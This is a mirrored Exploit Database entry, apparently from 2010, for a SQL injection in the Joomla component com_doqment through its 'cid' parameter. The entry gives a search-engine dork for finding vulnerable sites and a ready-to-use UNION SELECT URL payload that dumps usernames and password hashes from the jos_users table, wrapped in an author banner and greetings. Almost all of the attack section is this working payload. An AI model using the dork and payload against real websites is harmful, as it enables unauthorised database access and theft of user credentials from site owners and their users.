Joomla! Component com_doqment – ‘cid’ SQL Injection

• Exploit Database
• 136 阅读

• 作者： Gamoscu
  日期： 2010-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10965/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  ############################################################################# # # # Joomla Component com_doqment (cid) SQL Injection Vulnerability# # # #############################################################################     ########################################   [~] Author :Gamoscu [~] Site :www.1923turk.biz [~] Site :www.1923turk.com [~] Greetz :Baybora - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO [~] Blog :http://gamoscu.wordpress.com/   ########################################   [~] DORK: inurl:com_doqment   ########################################   [~] Exploit: /index.php?option=com_doqment&cid=[SQL] [~] Example: /index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--   ########################################